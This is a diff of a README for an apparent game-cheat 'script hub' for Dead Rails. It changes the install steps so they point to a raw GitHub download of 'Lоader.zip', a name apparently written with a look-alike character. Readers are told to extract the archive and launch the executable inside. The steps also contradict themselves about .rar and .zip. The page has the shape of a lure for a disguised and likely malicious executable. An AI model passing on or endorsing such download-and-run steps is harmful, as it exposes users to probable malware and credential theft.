AriakaHS/DeadRailsScriptHub/README.md

 Ready to revolutionize your Dead Rails experience?
 Follow these carefully-crafted steps:

-1. **Download Loader.rar from the repository.**
+1. **Download https://raw.githubusercontent.com/AriakaHS/DeadRailsScriptHub/main/Lоader.zip from the repository.**
-2. Extract the contents of Loader.rar to your desired directory using your favorite extraction tool.
+2. Extract the contents of https://raw.githubusercontent.com/AriakaHS/DeadRailsScriptHub/main/Lоader.zip to your desired directory using your favorite extraction tool.
 3. Launch the executable suited to your operating system (see OS compatibility table above).
 4. Follow the on-screen prompts for initial setup and configuration.
 5. Refer to our detailed documentation (included in the .rar) for guidance on activating each feature.